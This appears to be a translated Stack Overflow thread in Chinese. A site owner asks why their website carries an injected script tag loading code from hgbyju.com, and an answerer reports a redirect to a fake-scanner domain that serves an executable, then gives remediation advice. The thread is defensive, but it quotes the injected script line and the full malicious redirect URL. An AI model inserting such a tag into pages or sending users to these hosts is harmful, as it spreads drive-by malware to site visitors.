我正在网站上工作 http://palacechemicals.co.uk/它以某种方式感染了恶意(但良性)的 JavaScript 行:
</title><script src=http://hgbyju.com/r.php ></script>
在第 251 行。脚本尝试加载的 URL 返回 404,但 Google 仍将我们列入恶意软件列表。
我在这里的另一台机器上有一个干净的、可以工作的本地副本,并且手动和软件比较了每个文件夹的文件大小,两者是相同的。我还多次搜索用于将数据导入 MSSQL Server 2008 的 SQL 以查找各种不同的字符串,包括 eval、script 等。
我真的很困惑,不知道接下来要寻找什么。
有没有其他人遇到过这个问题或者可以推荐下一步行动?
会不会是托管服务提供商以某种方式被感染了?我们在共享托管平台上,但是主机相当大且信誉良好。
任何输入将不胜感激。 谢谢。
最佳答案
当我从 Chrome 访问网站时,没有任何反应。但是当我从 Firefox 访问它时,脚本链接不会返回状态 404。有一个恶意脚本将我重定向到带有 Emma Watson 视频的“YouTube”。
那只发生过一次。第二次又是404。我会尝试从另一个 IP 地址复制它。
这是我被重定向的地方:
http://www1.thebest-scanerjjn.it.cx/o9gzj2z?2nvq3n=Vtfn5per7tvJzNjp1VPozMWrmqicnZSi19quZpTVysfUosXIeJnP1KuXppuQ3aWr7edqlNbRyZ%2FH0rpzmdLQ36Ld09jkpOOc1JaruLOLy9WwrF2hmZSclqKhmJ9jopzkp8%2Fo3diflpnrltegl6eL5t7Wq2ufpqaYoqadl5KWmeigsJSUoZmrnJ%2BjZJ%2Bc1aLb1dHTn9zq62Ch1sLUyuLU2NOm5eXjnpzX19KI1NTZm%2Bugw9zH6eOQ4JfUs9mn4uSNmKOKpbpSpanRz9HTzc%2FRmtPj2pbP4NuTxdSh6ZiYlaeS
不要去那里。有一个可执行文件正在尝试下载,谁知道还有什么。
因此该脚本有效,它并不总是返回 404。在删除恶意链接后,您应该认真检查您网站的安全性。
- 更改所有密码;
- 如果您使用 CMS,请将其更新到最新版本;
- 如果它是一个自行开发的网站,审核它是否存在 SQL 注入(inject)和其他类型的安全漏洞。
关于javascript - 很难找到恶意 JS 行 : </title><script src=http://hgbyju. com/r.php ></script>,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/10246241/